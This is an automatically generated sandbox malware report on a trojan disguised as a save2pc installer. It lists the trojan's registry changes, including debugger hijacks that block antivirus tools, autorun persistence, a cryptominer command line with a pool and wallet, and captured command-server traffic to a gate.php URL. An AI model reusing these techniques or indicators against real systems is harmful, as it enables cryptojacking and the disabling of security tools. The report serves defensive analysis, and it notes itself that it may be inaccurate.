Gen.Variant.Kazy.376998_18349793de

by malwarelabrobot on November 2nd, 2014 in Malware Descriptions.

Trojan.Win32.Inject.tfnj (Kaspersky), Gen:Variant.Kazy.376998 (AdAware), Installer.Win32.InnoSetup.FD, Installer.Win32.InnoSetup.2.FD, Trojan.Win32.Iconomon.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Installer, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 18349793de9abd4621812a7418d28642
SHA1: d4b5e153cb6516c694c5aaca22c4bc87212db00f
SHA256: 098d738f0f41d3134471ec138249b0e6d9cf87de97b5e41217f8d985e0ba457a
SSDeep: 98304:jNPT0td6Jwb0VSTkyL2Cvdqu675FA O4/7gsO2EpPXoaWA7XlNBL:Gyub0VEkuJlk7O4zgJ2ra77XB
Size: 4707328 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: Firser
Created at: 2014-05-03 19:42:37
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:544
%original file name%.exe:1772
mscorsvw.exe:1912
Save2pcUltimate5.3.5.exe:1120

The Trojan injects its code into the following process(es):

winmgr.exe:1476
winmgr.exe:2040
Save2pcUltimate5.3.5.tmp:664
cvtres.exe:2276

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Save2pcUltimate5.3.5.exe (30622 bytes)

The process %original file name%.exe:1772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Windows Manager\winmgr.exe (34003 bytes)

The process winmgr.exe:2040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\Microsoft.com (34003 bytes)
%Program Files%\Windows Manager\3818273 (7972 bytes)
%System%\wbem\Logs\wbemprox.log (76 bytes)

The process Save2pcUltimate5.3.5.tmp:664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-60BO2.tmp\_isetup\_shfoldr.dll (23 bytes)

The process Save2pcUltimate5.3.5.exe:1120 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-VL84O.tmp\Save2pcUltimate5.3.5.tmp (7386 bytes)

Registry activity

The process %original file name%.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 29 DE 04 81 58 90 BF 36 F0 13 BD 9D 8E 8F 3F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"Save2pcUltimate5.3.5.exe" = "save2pc Ultimate Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process %original file name%.exe:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 1C C6 41 FF 1C 95 59 1D 2C 2A 1F A6 F6 33 D7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Windows Manager]
"winmgr.exe" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process winmgr.exe:1476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 4B 46 21 FA 03 6C C7 7F 8D EF BC FD B4 8F C2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process winmgr.exe:2040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ComboFix.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe]
"debugger" = "%System%\Microsoft.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"s" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamscheduler.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgidsagent.exe]
"debugger" = "%System%\Microsoft.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avconfig.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spybotsd.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbampt.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccuac.exe]
"debugger" = "%System%\Microsoft.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\ime]
"WindowsUpdate" = "%Program Files%\Windows Manager\winmgr.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGNT.EXE]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastUI.exe]
"debugger" = "%System%\Microsoft.com"

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"load" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmgr.exe]
"DisableExceptionChainValidation" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe]
"debugger" = "%System%\Microsoft.com"

[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"3243" = "%Program Files%\Windows Manager\winmgr.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrvx.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastSvc.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 9D A5 18 6B 2B 30 F8 FC E9 F4 6E 7C 02 30 C9"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zlclient.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrsx.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\keyscrambler.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe]
"debugger" = "%System%\Microsoft.com"

[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"Version" = "-a scrypt -o stratum tcp://us.clevermining.com:3333 -O 1AgcuTKWynduh4DV3vQ8PwxYSx3HZ6HiPh:pwd -t THREADS"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\instup.exe]
"debugger" = "%System%\Microsoft.com"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe]
"debugger" = "%System%\Microsoft.com"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"WindowsUpdate" = "%Program Files%\Windows Manager\winmgr.exe"

The process Save2pcUltimate5.3.5.tmp:664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA DD 11 77 A5 D3 F5 45 5E D8 ED 0F 9E 85 15 AD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process cvtres.exe:2276 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E 82 88 43 CF 14 7B AB 75 BD 97 79 5D 8A 3C 82"

The process mscorsvw.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "2340000"

The process Save2pcUltimate5.3.5.exe:1120 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA BF 78 5D 8D 71 78 AA 53 9A AB 68 65 0C 20 62"

Dropped PE files

MD5 File path
a2dc36bcfa8f6f688c0d548317ecd994 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Save2pcUltimate5.3.5.exe
92dc6ef532fbb4a5c3201469a5b5eb63 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-60BO2.tmp\_isetup\_shfoldr.dll
e4a2856522e6a817e3f0edd2677fa647 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-VL84O.tmp\Save2pcUltimate5.3.5.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: FDRLab, Inc.
Product Name: save2pc Ultimate
Product Version: 6.0.6.0
Legal Copyright:
Legal Trademarks:
Original Filename: Save2pc Ultimate 5.3.5.exe
Internal Name: Save2pc Ultimate 5.3.5.exe
File Version: 6.0.6.0
File Description:
Comments: save2pc Ultimate Setup
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 4699524 4699648 5.53937 4caabcbffb1d726a78b967f62f58fedb
.rsrc 4710400 6384 6656 2.97955 8f3fb68c0413a84fba7f7db260f31121
.reloc 4718592 12 512 0.070639 995fd363600beeba933b9ed31916e46c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.kcahsterix.co/gate.php
hxxp://www.kcahsterix.co/miners/CPUMiner.files
hxxp://kcahsterix.co/miners/CPUMiner.files


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Trojan Generic - POST To gate.php with no referer
ET TROJAN W32.Blackshades/Shadesrat Backdoor CnC Beacon

Traffic

POST /gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.kcahsterix.co
Content-Length: 194
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




crypt===gKtRWYqkDUYpieIdEM04iMgAEIgADNzcTRgACIgACIgACIgASVQNEIpIFKu9WZ
YBSKShCblRnbJpCIukUSgE0RWNFIlJXY31kVq4WatRWQqE0LOpiN4gHIQhFIzd3bk5WaXp
SYjdjZwUmZ3ATN1EGZidDNlljM3cjMmRGNxUjY5gjZxMzY5AjN5cDM

HTTP/1.1 200 OK


Date: Sat, 01 Nov 2014 06:02:07 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.4.30
Content-Length: 216
Connection: close
Content-Type: text/html; charset=UTF-8
8pyUEFURShEVgQXLgQ2dwpDaQlGS2oFSzg3UZh3dQhTU2NjVERDa1Rmb5d1SUV3YnFUMg8
ULgMzMzMjOt92Yucmbp5WatJXZ2VGbj5yc19yL6A3Y0tSb1RXYyR3cg8WLgQHc5J3YzBSY
toCIzVGbpZmLyVmbp1UVQN0LzJXZulWbv82YugXayVGdzhWYjt2LvoDc0RHagQnchR3cuI
XZulWb..



GET /miners/CPUMiner.files HTTP/1.1
Host: kcahsterix.co
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 01 Nov 2014 06:02:07 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Sun, 20 Jul 2014 21:57:04 GMT
ETag: "1040140-171200-4fea7122a49f5"
Accept-Ranges: bytes
Content-Length: 1511936
Connection: close
Content-Type: text/plain; charset=UTF-8
......................................................................
........................S.R.E.S.U._.Y.E.K.H.........................0.
..E.N.I.H.C.A.M._.L.A.C.O.L._.Y.E.K.H.........................@...R.E.
S.U._.T.N.E.R.R.U.C._.Y.E.K.H.........................>...G.I.F.N.O
.C._.T.N.E.R.R.U.C._.Y.E.K.H.........................B...T.O.O.R._.S.E
.S.S.A.L.C._.Y.E.K.H.........................>.............2.3.m.e.
t.s.y.S.\.>.t.o.o.R.m.e.t.s.y.S.<.......2.3.m.e.t.s.y.S.......`.
..^...\...J.........................................................&g
t;.t.o.o.R.m.e.t.s.y.S.<.......>.t.o.o.R.m.e.t.s.y.S.<.......
h...f...d...J.........................................................
......................................................................
......................................................................
.....................................7.7.7.7.7.7.7.7.7.7.7.7h7d7`7\7X7
T7P7L7H7D7@7<7874707,7(7$7 7.7.7.7.7.7.7.7.6.6.6.6.6.6.6.6.6.6.6.6.
6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6|6x6t6p6l6h6d6`6\6X6T6P6L6H6D
6@6<6864606,6(6$6 6.6.6.6.6.6.5.5.5.5.5.5.5.5.5.5...........0.0.0.0
|0x0t0p0l0h0d0`0\0X0T0P0L0H0D0@0<0804000,0(0$0 0.0.0.0....H......5.
5.5.5.5.5.5.4.4.4.4.4.4.4.4.4.4.4.4.2p2l2h2d2`2\2X2T2P2L2H2D2@2<282
4202,2(2$2 2.2.2.2.2.2.2.2.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1
.1.1.1.1.1.1.1.1.1.1.1|1x1t1p1l1h1d1`1\1X1T1P1L1H1D1@1<1.1.0.0.0.0.
0.0.0.0.......p...0.040 [email protected]"
1.1.0.0.0.0.0....4..0.=A<.<.<o737.7.6.6.6.6.6i6U6F616.5.5
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

Save2pcUltimate5.3.5.exe_1120:

.text
`.itext
`.data
.idata
.rdata
@.rsrc
ENoMonitorSupportException
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.3) (u)
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
GetKeyboardType
kernel32.dll
MsgWaitForMultipleObjects
ExitWindowsEx
GetWindowsDirectoryW
GetCPInfo
comctl32.dll
KWindows
6MsgIDs
Msgs
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
/SUPPRESSMSGBOXES
/PASSWORD=password
Specifies the password to use.
For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline
shell32.dll
/SL5="$%x,%d,%d,
Invalid file name - %s
Invalid variant operation
External exception %x
Interface not supported
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation

winmgr.exe_2040:

.text
`.rsrc
@.reloc
-3.VX 
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
%X4xF-}0j
,&<;!0';49&
"!7$3
?5$9"
."/56*'?
5))-:8)9
"Y.yMN
;1 ,6'0,#.1
8 81`40-8/.23<)8 |
0 -8<!'&
)$!,)<!'&
.zym_
U@RJJHMM!.G!.HL!vrbshqu/dyd
??7<5~3?=1%
,:&<;*,:
Jk.WP
\"1&'=;:
v2.0.50727
System.Drawing
System.Windows.Forms
Microsoft.Win32
RegistryKey
Microsoft.VisualBasic
Microsoft.VisualBasic.CompilerServices
System.IO
System.Management
Operators
WebClient
System.Net
System.Text
System.ComponentModel
System.Security.AccessControl
System.Timers
System.Threading
System.Diagnostics
Microsoft.VisualBasic.Devices
Microsoft.VisualBasic.MyServices
ProcessWindowStyle
System.Runtime.InteropServices
System.Collections
System.Runtime.CompilerServices
System.Net.Sockets
System.Resources
System.Globalization
System.Security.Cryptography
System.Security.Principal
WindowsIdentity
WindowsPrincipal
WindowsBuiltInRole
System.Reflection
WebRequest
WebResponse
System.Text.RegularExpressions
Microsoft.VisualBasic.ApplicationServices
System.Reflection.Emit
System.Configuration
System.Runtime.Serialization.Formatters.Binary
System.Collections.Generic
NotSupportedException
InvalidOperationException
.ctor
OpenSubKey
set_WindowStyle
get_ExecutablePath
set_Key
CreateSubKey
GetExecutingAssembly
set_UseShellExecute
Join
a.exe
kernel32.dll
user32.dll
Crypt32.dll
advapi32.dll
wintrust.dll
.cctor
System.Object.Finalize
System.Windows.Forms.Form.Dispose
System.Object.Equals
System.Object.GetHashCode
System.Object.ToString
portableExecutable_0
PortableExecutable
JLibrary.PortableExecutable
EnumImports
System.Collections.Generic.IEnumerable<JLibrary.PortableExecutable.IMAGE_SECTION_HEADER>.GetEnumerator
System.Collections.IEnumerable.GetEnumerator
System.Collections.Generic.IEnumerator<JLibrary.PortableExecutable.IMAGE_SECTION_HEADER>.get_Current
System.Collections.IEnumerator.Reset
System.IDisposable.Dispose
System.Collections.IEnumerator.get_Current
System.Collections.Generic.IEnumerator<JLibrary.PortableExecutable.IMAGE_SECTION_HEADER>.Current
System.Collections.IEnumerator.Current
<EnumImports>d__8
System.Collections.Generic.IEnumerable<JLibrary.PortableExecutable.IMAGE_IMPORT_DESCRIPTOR>.GetEnumerator
System.Collections.Generic.IEnumerator<JLibrary.PortableExecutable.IMAGE_IMPORT_DESCRIPTOR>.get_Current
System.Collections.Generic.IEnumerator<JLibrary.PortableExecutable.IMAGE_IMPORT_DESCRIPTOR>.Current
JLibrary.Tools
MajorOperatingSystemVersion
MinorOperatingSystemVersion
IMAGE_IMPORT_DESCRIPTOR
a.Resources.resources
a.Base.resources
1.0.0.0
$cf9b87da-47a8-4503-b119-bbe09e7c36a9
_CorExeMain
mscoree.dll
_2342342353245
a, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
Image contains a CLR runtime header. Currently only native binaries are supported; no .NET dependent libraries.
File is of the PE32  format. Currently support only extends to PE32 images. Either recompile the binary as x86, or choose a different target.
Module's entry point function reported a failure
Entry method of module reported a failure
Unable to locate imported function '{0}' from module '{1}' in the remote process.
.manifest
KERNEL32.dll
Error occurred while executing remote thread.
a.Resources
a.Base

winmgr.exe_1476_rwx_01140000_00002000:

Ie%xW

Save2pcUltimate5.3.5.tmp_664:

.text
`.itext
`.data
.idata
.rdata
@.rsrc
Windows
ENoMonitorSupportException
.uvCOu
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
Uh.xB
EInvalidGraphicOperation
UhU%C
Uh%.C
PasswordChart
OnKeyDownTME
OnKeyPress
OnKeyUpPLE
ssHorizontal
OnKeyUp
TCustomButton.TButtonStyle
AutoHotkeysP
AutoHotkeys
TKeyEvent
TKeyPressEvent
HelpKeyword
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
EXPORT
TPSExec
TPSRuntimeClassImporterPkP
TPSExportedVar
TPSCustomDebugExec
TPSDebugExec
OnKeyUptKE
Uh.pJ
t.Htb
Uh.kK
1.2.1
TPasswordEdit
PasswordEdit(
Passwordt
PasswordPage
PasswordLabel
PasswordEdit
PasswordEditLabel
Uh.cL
CheckPassword
<requestedExecutionLevel level="
IMsg
FormKeyDown
PasswordCheckHash
TKeyNameConst
TOutputMsgWizardPage
TOutputMsgMemoWizardPage
MsgLabel
Msg1Label
Msg2Label
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;
function GetIniString(const Section, Key, Default, Filename: String): String;
function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;
function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;
function IniKeyExists(const Section, Key, Filename: String): Boolean;
function SetIniString(const Section, Key, Value, Filename: String): Boolean;
function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;
function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;
procedure DeleteIniEntry(const Section, Key, Filename: String);
function GetCmdTail: String;
function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;
function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;
